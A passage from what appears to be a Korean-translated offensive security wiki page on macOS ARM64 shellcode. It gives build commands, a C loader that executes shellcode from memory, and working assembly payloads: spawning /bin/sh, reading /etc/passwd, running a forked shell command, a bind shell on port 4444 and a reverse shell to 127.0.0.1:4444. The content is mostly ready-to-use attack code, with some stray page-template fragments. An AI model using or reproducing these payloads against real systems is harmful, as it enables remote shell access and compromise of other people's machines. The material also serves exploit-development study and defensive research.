(lldb) po [$x0 arguments]
<__NSArrayI 0x1736801e0>(
-c,
whoami
)

쉘코드

컴파일하려면:

as -o shell.o shell.s
ld -o shell shell.o -macosx_version_min 13.0 -lSystem -L /Library/Developer/CommandLineTools/SDKs/MacOSX.sdk/usr/lib

# You could also use this
ld -o shell shell.o -syslibroot $(xcrun -sdk macosx --show-sdk-path) -lSystem

바이트를 추출하려면:

# Code from https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/master/helper/extract.sh
for c in $(objdump -d "s.o" | grep -E '[0-9a-f]+:' | cut -f 1 | cut -d : -f 2) ; do
echo -n '\\x'$c
done
쉘코드를 테스트하는 C 코드

```c // code from https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/master/helper/loader.c // gcc loader.c -o loader #include #include #include #include

int (*sc)();

char shellcode[] = "";

int main(int argc, char **argv) { printf("[>] Shellcode Length: %zd Bytes\n", strlen(shellcode));

void *ptr = mmap(0, 0x1000, PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE | MAP_JIT, -1, 0);

if (ptr == MAP_FAILED) { perror("mmap"); exit(-1); } printf("[+] SUCCESS: mmap\n"); printf(" |-> Return = %p\n", ptr);

void *dst = memcpy(ptr, shellcode, sizeof(shellcode)); printf("[+] SUCCESS: memcpy\n"); printf(" |-> Return = %p\n", dst);

int status = mprotect(ptr, 0x1000, PROT_EXEC | PROT_READ);

if (status == -1) { perror("mprotect"); exit(-1); } printf("[+] SUCCESS: mprotect\n"); printf(" |-> Return = %d\n", status);

printf("[>] Trying to execute shellcode...\n");

sc = ptr; sc();

return 0; }

</details>

#### 쉘

[**여기**](https://github.com/daem0nc0re/macOS\_ARM64\_Shellcode/blob/master/shell.s)에서 가져와 설명됨.

<div data-gb-custom-block data-tag="tabs"></div>

<div data-gb-custom-block data-tag="tab" data-title='adr를 사용한 경우'>

```armasm
.section __TEXT,__text ; This directive tells the assembler to place the following code in the __text section of the __TEXT segment.
.global _main         ; This makes the _main label globally visible, so that the linker can find it as the entry point of the program.
.align 2              ; This directive tells the assembler to align the start of the _main function to the next 4-byte boundary (2^2 = 4).

_main:
adr  x0, sh_path  ; This is the address of "/bin/sh".
mov  x1, xzr      ; Clear x1, because we need to pass NULL as the second argument to execve.
mov  x2, xzr      ; Clear x2, because we need to pass NULL as the third argument to execve.
mov  x16, #59     ; Move the execve syscall number (59) into x16.
svc  #0x1337      ; Make the syscall. The number 0x1337 doesn't actually matter, because the svc instruction always triggers a supervisor call, and the exact action is determined by the value in x16.

sh_path: .asciz "/bin/sh"

{% 탭 제목="스택과 함께" %}

.section __TEXT,__text ; This directive tells the assembler to place the following code in the __text section of the __TEXT segment.
.global _main         ; This makes the _main label globally visible, so that the linker can find it as the entry point of the program.
.align 2              ; This directive tells the assembler to align the start of the _main function to the next 4-byte boundary (2^2 = 4).

_main:
; We are going to build the string "/bin/sh" and place it on the stack.

mov  x1, #0x622F  ; Move the lower half of "/bi" into x1. 0x62 = 'b', 0x2F = '/'.
movk x1, #0x6E69, lsl #16 ; Move the next half of "/bin" into x1, shifted left by 16. 0x6E = 'n', 0x69 = 'i'.
movk x1, #0x732F, lsl #32 ; Move the first half of "/sh" into x1, shifted left by 32. 0x73 = 's', 0x2F = '/'.
movk x1, #0x68, lsl #48   ; Move the last part of "/sh" into x1, shifted left by 48. 0x68 = 'h'.

str  x1, [sp, #-8] ; Store the value of x1 (the "/bin/sh" string) at the location `sp - 8`.

; Prepare arguments for the execve syscall.

mov  x1, #8       ; Set x1 to 8.
sub  x0, sp, x1   ; Subtract x1 (8) from the stack pointer (sp) and store the result in x0. This is the address of "/bin/sh" string on the stack.
mov  x1, xzr      ; Clear x1, because we need to pass NULL as the second argument to execve.
mov  x2, xzr      ; Clear x2, because we need to pass NULL as the third argument to execve.

; Make the syscall.

mov  x16, #59     ; Move the execve syscall number (59) into x16.
svc  #0x1337      ; Make the syscall. The number 0x1337 doesn't actually matter, because the svc instruction always triggers a supervisor call, and the exact action is determined by the value in x16.

cat로 읽기

목표는 execve("/bin/cat", ["/bin/cat", "/etc/passwd"], NULL)를 실행하는 것이므로 두 번째 인자 (x1)는 매개변수 배열이어야 합니다 (메모리에서는 주소 스택을 의미함).

.section __TEXT,__text     ; Begin a new section of type __TEXT and name __text
.global _main              ; Declare a global symbol _main
.align 2                   ; Align the beginning of the following code to a 4-byte boundary

_main:
; Prepare the arguments for the execve syscall
sub sp, sp, #48        ; Allocate space on the stack
mov x1, sp             ; x1 will hold the address of the argument array
adr x0, cat_path
str x0, [x1]           ; Store the address of "/bin/cat" as the first argument
adr x0, passwd_path    ; Get the address of "/etc/passwd"
str x0, [x1, #8]       ; Store the address of "/etc/passwd" as the second argument
str xzr, [x1, #16]     ; Store NULL as the third argument (end of arguments)

adr x0, cat_path
mov x2, xzr            ; Clear x2 to hold NULL (no environment variables)
mov x16, #59           ; Load the syscall number for execve (59) into x8
svc 0                  ; Make the syscall


cat_path: .asciz "/bin/cat"
.align 2
passwd_path: .asciz "/etc/passwd"

메인 프로세스가 종료되지 않도록 포크에서 sh를 사용하여 명령을 호출합니다

.section __TEXT,__text     ; Begin a new section of type __TEXT and name __text
.global _main              ; Declare a global symbol _main
.align 2                   ; Align the beginning of the following code to a 4-byte boundary

_main:
; Prepare the arguments for the fork syscall
mov x16, #2            ; Load the syscall number for fork (2) into x8
svc 0                  ; Make the syscall
cmp x1, #0             ; In macOS, if x1 == 0, it's parent process, https://opensource.apple.com/source/xnu/xnu-7195.81.3/libsyscall/custom/__fork.s.auto.html
beq _loop              ; If not child process, loop

; Prepare the arguments for the execve syscall

sub sp, sp, #64        ; Allocate space on the stack
mov x1, sp             ; x1 will hold the address of the argument array
adr x0, sh_path
str x0, [x1]           ; Store the address of "/bin/sh" as the first argument
adr x0, sh_c_option    ; Get the address of "-c"
str x0, [x1, #8]       ; Store the address of "-c" as the second argument
adr x0, touch_command  ; Get the address of "touch /tmp/lalala"
str x0, [x1, #16]      ; Store the address of "touch /tmp/lalala" as the third argument
str xzr, [x1, #24]     ; Store NULL as the fourth argument (end of arguments)

adr x0, sh_path
mov x2, xzr            ; Clear x2 to hold NULL (no environment variables)
mov x16, #59           ; Load the syscall number for execve (59) into x8
svc 0                  ; Make the syscall


_exit:
mov x16, #1            ; Load the syscall number for exit (1) into x8
mov x0, #0             ; Set exit status code to 0
svc 0                  ; Make the syscall

_loop: b _loop

sh_path: .asciz "/bin/sh"
.align 2
sh_c_option: .asciz "-c"
.align 2
touch_command: .asciz "touch /tmp/lalala"

Bind 쉘

https://raw.githubusercontent.com/daem0nc0re/macOS_ARM64_Shellcode/master/bindshell.s에서 포트 4444로 Bind 쉘

.section __TEXT,__text
.global _main
.align 2
_main:
call_socket:
// s = socket(AF_INET = 2, SOCK_STREAM = 1, 0)
mov  x16, #97
lsr  x1, x16, #6
lsl  x0, x1, #1
mov  x2, xzr
svc  #0x1337

// save s
mvn  x3, x0

call_bind:
/*
* bind(s, &sockaddr, 0x10)
*
* struct sockaddr_in {
*     __uint8_t       sin_len;     // sizeof(struct sockaddr_in) = 0x10
*     sa_family_t     sin_family;  // AF_INET = 2
*     in_port_t       sin_port;    // 4444 = 0x115C
*     struct  in_addr sin_addr;    // 0.0.0.0 (4 bytes)
*     char            sin_zero[8]; // Don't care
* };
*/
mov  x1, #0x0210
movk x1, #0x5C11, lsl #16
str  x1, [sp, #-8]
mov  x2, #8
sub  x1, sp, x2
mov  x2, #16
mov  x16, #104
svc  #0x1337

call_listen:
// listen(s, 2)
mvn  x0, x3
lsr  x1, x2, #3
mov  x16, #106
svc  #0x1337

call_accept:
// c = accept(s, 0, 0)
mvn  x0, x3
mov  x1, xzr
mov  x2, xzr
mov  x16, #30
svc  #0x1337

mvn  x3, x0
lsr  x2, x16, #4
lsl  x2, x2, #2

call_dup:
// dup(c, 2) -> dup(c, 1) -> dup(c, 0)
mvn  x0, x3
lsr  x2, x2, #1
mov  x1, x2
mov  x16, #90
svc  #0x1337
mov  x10, xzr
cmp  x10, x2
bne  call_dup

call_execve:
// execve("/bin/sh", 0, 0)
mov  x1, #0x622F
movk x1, #0x6E69, lsl #16
movk x1, #0x732F, lsl #32
movk x1, #0x68, lsl #48
str  x1, [sp, #-8]
mov	 x1, #8
sub  x0, sp, x1
mov  x1, xzr
mov  x2, xzr
mov  x16, #59
svc  #0x1337

역쉘

https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/master/reverseshell.s에서 revshell을 127.0.0.1:4444로 설정합니다.

.section __TEXT,__text
.global _main
.align 2
_main:
call_socket:
// s = socket(AF_INET = 2, SOCK_STREAM = 1, 0)
mov  x16, #97
lsr  x1, x16, #6
lsl  x0, x1, #1
mov  x2, xzr
svc  #0x1337

// save s
mvn  x3, x0

call_connect:
/*
* connect(s, &sockaddr, 0x10)
*
* struct sockaddr_in {
*     __uint8_t       sin_len;     // sizeof(struct sockaddr_in) = 0x10
*     sa_family_t     sin_family;  // AF_INET = 2
*     in_port_t       sin_port;    // 4444 = 0x115C
*     struct  in_addr sin_addr;    // 127.0.0.1 (4 bytes)
*     char            sin_zero[8]; // Don't care
* };
*/
mov  x1, #0x0210
movk x1, #0x5C11, lsl #16
movk x1, #0x007F, lsl #32
movk x1, #0x0100, lsl #48
str  x1, [sp, #-8]
mov  x2, #8
sub  x1, sp, x2
mov  x2, #16
mov  x16, #98
svc  #0x1337

lsr  x2, x2, #2

call_dup:
// dup(s, 2) -> dup(s, 1) -> dup(s, 0)
mvn  x0, x3
lsr  x2, x2, #1
mov  x1, x2
mov  x16, #90
svc  #0x1337
mov  x10, xzr
cmp  x10, x2
bne  call_dup

call_execve:
// execve("/bin/sh", 0, 0)
mov  x1, #0x622F
movk x1, #0x6E69, lsl #16
movk x1, #0x732F, lsl #32
movk x1, #0x68, lsl #48
str  x1, [sp, #-8]
mov	 x1, #8
sub  x0, sp, x1
mov  x1, xzr
mov  x2, xzr
mov  x16, #59
svc  #0x1337